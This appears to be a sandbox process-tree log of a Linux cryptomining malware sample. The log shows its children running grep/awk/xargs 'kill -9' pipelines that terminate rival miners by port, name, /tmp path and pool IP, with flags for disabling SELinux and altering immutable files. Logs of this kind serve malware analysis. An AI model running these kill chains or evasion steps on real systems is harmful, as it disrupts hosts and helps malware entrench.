- /bin/grep
  grep -v -
  2⤵
  PID:941
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:940
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:939
- /bin/grep
  grep :143
  2⤵
  PID:938
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:948
- /bin/grep
  grep -v -
  2⤵
  PID:947
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:946
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:945
- /bin/grep
  grep :2222
  2⤵
  PID:944
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:955
- /bin/grep
  grep -v -
  2⤵
  PID:954
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:953
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:952
- /bin/grep
  grep :3333
  2⤵
  PID:951
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:962
- /bin/grep
  grep -v -
  2⤵
  PID:961
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:960
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:959
- /bin/grep
  grep :3389
  2⤵
  PID:958
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:969
- /bin/grep
  grep -v -
  2⤵
  PID:968
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:967
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:966
- /bin/grep
  grep :5555
  2⤵
  PID:965
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:976
- /bin/grep
  grep -v -
  2⤵
  PID:975
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:974
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:973
- /bin/grep
  grep :6666
  2⤵
  PID:972
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:982
- /bin/grep
  grep -v -
  2⤵
  PID:981
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:980
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:979
- /bin/grep
  grep :6665
  2⤵
  PID:978
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:989
- /bin/grep
  grep -v -
  2⤵
  PID:988
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:987
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:986
- /bin/grep
  grep :6667
  2⤵
  PID:985
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:996
- /bin/grep
  grep -v -
  2⤵
  PID:995
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:994
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:993
- /bin/grep
  grep :7777
  2⤵
  PID:992
- /bin/grep
  grep :8444
  2⤵
  PID:998
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1000
- /bin/grep
  grep -v -
  2⤵
  PID:1001
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1002
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:999
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1008
- /bin/grep
  grep -v -
  2⤵
  PID:1007
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1006
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1005
- /bin/grep
  grep :3347
  2⤵
  PID:1004
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1014
- /bin/grep
  grep -v -
  2⤵
  PID:1013
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1012
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1011
- /bin/grep
  grep :10008
  2⤵
  PID:1010
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1019
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1018
- /bin/grep
  grep :3333
  2⤵
  PID:1017
- /bin/grep
  grep -v grep
  2⤵
  PID:1016
- /bin/ps
  ps aux
  2⤵
  PID:1015
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1024
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1023
- /bin/grep
  grep :5555
  2⤵
  PID:1022
- /bin/grep
  grep -v grep
  2⤵
  PID:1021
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1020
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1029
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1028
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1027
- /bin/grep
  grep -v grep
  2⤵
  PID:1026
- /bin/ps
  ps aux
  2⤵
  PID:1025
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1034
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1033
- /bin/grep
  grep log_
  2⤵
  PID:1032
- /bin/grep
  grep -v grep
  2⤵
  PID:1031
- /bin/ps
  ps aux
  2⤵
  PID:1030
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1039
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1038
- /bin/grep
  grep systemten
  2⤵
  PID:1037
- /bin/grep
  grep -v grep
  2⤵
  PID:1036
- /bin/ps
  ps aux
  2⤵
  PID:1035
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1044
- - /usr/local/sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1045
- - /usr/local/bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1045
- - /usr/sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1045
- - /usr/bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1045
- - /sbin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1045
- - /bin/kill
    kill -9 10
    3⤵
    - Disables SELinux
    PID:1045
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1043
- /bin/grep
  grep netns
  2⤵
  PID:1042
- /bin/grep
  grep -v grep
  2⤵
  PID:1041
- /bin/ps
  ps aux
  2⤵
  PID:1040
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1050
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1049
- /bin/grep
  grep voltuned
  2⤵
  PID:1048
- /bin/grep
  grep -v grep
  2⤵
  PID:1047
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1046
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1055
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1054
- /bin/grep
  grep darwin
  2⤵
  PID:1053
- /bin/grep
  grep -v grep
  2⤵
  PID:1052
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1051
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1060
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1059
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1058
- /bin/grep
  grep -v grep
  2⤵
  PID:1057
- /bin/ps
  ps aux
  2⤵
  PID:1056
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1065
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1064
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1063
- /bin/grep
  grep -v grep
  2⤵
  PID:1062
- /bin/ps
  ps aux
  2⤵
  PID:1061
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1070
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1069
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1068
- /bin/grep
  grep -v grep
  2⤵
  PID:1067
- /bin/ps
  ps aux
  2⤵
  PID:1066
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1075
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1074
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1073
- /bin/grep
  grep -v grep
  2⤵
  PID:1072
- /bin/ps
  ps aux
  2⤵
  PID:1071
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1080
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1079
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1078
- /bin/grep
  grep -v grep
  2⤵
  PID:1077
- /bin/ps
  ps aux
  2⤵
  PID:1076
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1085
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1084
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1083
- /bin/grep
  grep -v grep
  2⤵
  PID:1082
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1081
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1090
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1089
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1088
- /bin/grep
  grep -v grep
  2⤵
  PID:1087
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1086
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1095
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1094
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1093
- /bin/grep
  grep -v grep
  2⤵
  PID:1092
- /bin/ps
  ps aux
  2⤵
  PID:1091
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1100
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1099
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1098
- /bin/grep
  grep -v grep
  2⤵
  PID:1097
- /bin/ps
  ps aux
  2⤵
  PID:1096
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1108
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1107
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1106
- /bin/grep
  grep -v grep
  2⤵
  PID:1105
- /bin/ps
  ps aux
  2⤵
  PID:1104
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1113
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1112
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1111
- /bin/grep
  grep -v grep
  2⤵
  PID:1110
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1109
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1118
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1117
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1116
- /bin/grep
  grep -v grep
  2⤵
  PID:1115
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1114
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1123
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1122
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1121
- /bin/grep
  grep -v grep
  2⤵
  PID:1120
- /bin/ps
  ps aux
  2⤵
  PID:1119
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1128
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1127
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:1126
- /bin/grep
  grep -v grep
  2⤵
  PID:1125
- /bin/ps
  ps aux
  2⤵
  PID:1124
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1133
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1132
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:1131
- /bin/grep
  grep -v grep
  2⤵
  PID:1130
- /bin/ps
  ps aux
  2⤵
  PID:1129
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1138
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1137
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:1136
- /bin/grep
  grep -v grep
  2⤵
  PID:1135
- /bin/ps
  ps aux
  2⤵
  PID:1134
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1143
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1142
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:1141
- /bin/grep
  grep -v grep
  2⤵
  PID:1140
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1139
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1148
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1147
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1146
- /bin/grep
  grep -v grep
  2⤵
  PID:1145
- /bin/ps
  ps aux
  2⤵
  PID:1144
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1153
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1152
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1151
- /bin/grep
  grep -v grep
  2⤵
  PID:1150
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1149
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1158
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1157
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1156
- /bin/grep
  grep -v grep
  2⤵
  PID:1155
- /bin/ps
  ps aux
  2⤵
  PID:1154
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1163
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1162
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1161
- /bin/grep
  grep -v grep
  2⤵
  PID:1160
- /bin/ps
  ps aux
  2⤵
  PID:1159
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1168
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1167
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1166
- /bin/grep
  grep -v grep
  2⤵
  PID:1165
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1164
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1173
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1172
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1171
- /bin/grep
  grep -v grep
  2⤵
  PID:1170
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1169
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1178
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1177
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1176
- /bin/grep
  grep -v grep
  2⤵
  PID:1175
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1174
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1183
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1182
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1181
- /bin/grep
  grep -v grep
  2⤵
  PID:1180
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1179
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1188
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1187
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1186
- /bin/grep
  grep -v grep
  2⤵
  PID:1185
- /bin/ps
  ps aux
  2⤵
  PID:1184
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1193
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1192
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1191
- /bin/grep
  grep -v grep
  2⤵
  PID:1190
- /bin/ps
  ps aux
  2⤵
  PID:1189
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1198
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1197
- /bin/grep
  grep HiPxCJRS
  2⤵
  PID:1196
- /bin/grep
  grep -v grep
  2⤵
  PID:1195
- /bin/ps
  ps aux
  2⤵
  PID:1194
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1203
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1202
- /bin/grep
  grep http_0xCC030
  2⤵
  - Disables SELinux
  PID:1201
- /bin/grep
  grep -v grep
  2⤵
  PID:1200
- /bin/ps
  ps aux
  2⤵
  PID:1199
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1208
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1207
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:1206
- /bin/grep
  grep -v grep
  2⤵
  PID:1205
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1204
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1213
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1212
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:1211
- /bin/grep
  grep -v grep
  2⤵
  PID:1210
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1209
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1218
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1217
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:1216
- /bin/grep
  grep -v grep
  2⤵
  PID:1215
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1214
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1223
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1222
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:1221
- /bin/grep
  grep -v grep
  2⤵
  PID:1220
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1219
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1228
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1227
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:1226
- /bin/grep
  grep -v grep
  2⤵
  PID:1225
- /bin/ps
  ps aux
  2⤵
  PID:1224
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1232
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  - Reads runtime system information
  PID:1231
- /bin/grep
  grep -v grep
  2⤵
  PID:1230
- /bin/ps
  ps aux
  2⤵
  PID:1229
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1237
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1236
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:1235
- /bin/grep
  grep -v grep
  2⤵
  PID:1234
- /bin/ps
  ps aux
  2⤵
  PID:1233
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1242
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1241
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:1240
- /bin/grep
  grep -v grep
  2⤵
  PID:1239
- /bin/ps
  ps aux
  2⤵
  PID:1238
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1247
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1246
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:1245
- /bin/grep
  grep -v grep
  2⤵
  PID:1244
- /bin/ps
  ps aux
  2⤵
  PID:1243
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1252
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1251
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:1250
- /bin/grep
  grep -v grep
  2⤵
  PID:1249
- /bin/ps
  ps aux
  2⤵
  PID:1248
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1257
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1256
- /bin/grep
  grep nqscheduler
  2⤵
  PID:1255
- /bin/grep
  grep -v grep
  2⤵
  PID:1254
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1253
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1262
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1261
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:1260
- /bin/grep
  grep -v grep
  2⤵
  PID:1259
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1258
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1268
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:1267
- /bin/grep
  grep "]"
  2⤵
  PID:1266
- /bin/grep
  grep -v aux
  2⤵
  PID:1265
- /bin/grep
  grep -v grep
  2⤵
  PID:1264
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1263
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1273
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1272
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:1271
- /bin/grep
  grep -v grep
  2⤵
  PID:1270
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1269
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1278
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1277
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:1276
- /bin/grep
  grep -v grep
  2⤵
  PID:1275
- /bin/ps
  ps aux
  2⤵
  PID:1274
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1283
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1282
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:1281
- /bin/grep
  grep -v grep
  2⤵
  PID:1280
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1279
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1290
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:1289
- /bin/grep
  grep -v _
  2⤵
  PID:1288
- /bin/grep
  grep -v -
  2⤵
  PID:1287
- /bin/grep
  grep -v /
  2⤵
  PID:1286
- /bin/grep
  grep -v grep
  2⤵
  PID:1285
- /bin/ps
  ps aux
  2⤵
  PID:1284
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1295
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1294
- /bin/grep
  grep "\\[^"
  2⤵
  PID:1293
- /bin/grep
  grep -v grep
  2⤵
  PID:1292
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1291
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1300
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1299
- /bin/grep
  grep rsync
  2⤵
  PID:1298
- /bin/grep
  grep -v grep
  2⤵
  PID:1297
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1296
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1305
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1304
- /bin/grep
  grep watchd0g
  2⤵
  PID:1303
- /bin/grep
  grep -v grep
  2⤵
  PID:1302
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1301
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1310
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1309
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1308
- /bin/grep
  grep -v grep
  2⤵
  PID:1307
- /bin/ps
  ps aux
  2⤵
  PID:1306
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1308
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1308
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1308
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1308
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1308
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1308
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1315
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1314
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  - Disables SELinux
  PID:1313
- /bin/grep
  grep -v grep
  2⤵
  PID:1312
- /bin/ps
  ps aux
  2⤵
  PID:1311
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1320
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1319
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1318
- /bin/grep
  grep -v grep
  2⤵
  PID:1317
- /bin/ps
  ps aux
  2⤵
  PID:1316
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1325
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1324
- /bin/grep
  grep gitee.com
  2⤵
  PID:1323
- /bin/grep
  grep -v grep
  2⤵
  PID:1322
- /bin/ps
  ps aux
  2⤵
  PID:1321
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1330
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1329
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1328
- /bin/grep
  grep -v grep
  2⤵
  PID:1327
- /bin/ps
  ps aux
  2⤵
  PID:1326
- /bin/ps
  ps aux
  2⤵
  PID:1331
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:1333
- /bin/grep
  grep -v grep
  2⤵
  PID:1332
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1335
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1334
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1340
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1339
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:1338
- /bin/grep
  grep -v grep
  2⤵
  PID:1337
- /bin/ps
  ps aux
  2⤵
  PID:1336
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1345
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1344
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:1343
- /bin/grep
  grep -v grep
  2⤵
  PID:1342
- /bin/ps
  ps aux
  2⤵
  PID:1341
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1350
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1349
- /bin/grep
  grep kthrotlds
  2⤵
  PID:1348
- /bin/grep
  grep -v grep
  2⤵
  PID:1347
- /bin/ps
  ps aux
  2⤵
  PID:1346
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1355
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1354
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:1353
- /bin/grep
  grep -v grep
  2⤵
  PID:1352
- /bin/ps
  ps aux
  2⤵
  PID:1351
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1360
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1359
- /bin/grep
  grep netdns
  2⤵
  PID:1358
- /bin/grep
  grep -v grep
  2⤵
  PID:1357
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1356
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1365
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1364
- /bin/grep
  grep watchdogs
  2⤵
  PID:1363
- /bin/grep
  grep -v grep
  2⤵
  PID:1362
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
